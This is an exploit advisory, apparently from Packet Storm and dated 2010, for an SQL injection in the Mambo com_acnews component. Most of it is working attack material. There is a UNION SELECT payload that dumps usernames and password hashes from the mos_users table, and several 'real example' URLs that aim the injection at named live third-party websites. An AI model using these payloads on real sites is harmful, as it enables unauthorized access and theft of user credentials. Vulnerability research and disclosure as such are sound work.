Mambo ACNews SQL Injection

2010-02-16T00:00:00
ID PACKETSTORM:86369
Type packetstorm
Reporter Xzit3
Modified 2010-02-16T00:00:00

Description

                                        
                                            `  
  
# Title: Mambo Component com_acnews [id] | SQL Injection  
# Date: 15/02/2010  
# Author: Ro0T-MaFia  
# Software Link: ....  
# Version: ...  
# Tested on: http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--  
---  
  
Mambo Component com_acnews [id] | SQL Injection  
  
Author: Zero Bits & Xzit3  
Team: Ro0T-MaFia  
Member's: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx  
Date: 15/02/2010  
Contact: Zer_Bits@GobiernoFederal.com - wscalle1@e-r00t.org<mailto:wscalle1@e-r00t.org>  
Country: Venezuela - Mexico  
############################  
  
Vulnerability's:  
  
[+] SQL Injection:  
Error: You have an error in your SQL syntax.  
  
  
BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi)  
  
Real example:  
  
http://www.artcom.net/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)  
http://www.artcom.de/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0  
  
http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--  
  
###########################  
  
Visit:  
  
Ilegalintrusion.NET | Seguridadblanca.ORG | Diosdelared.COM | Remoteexecution.ORG  
  
  
  
`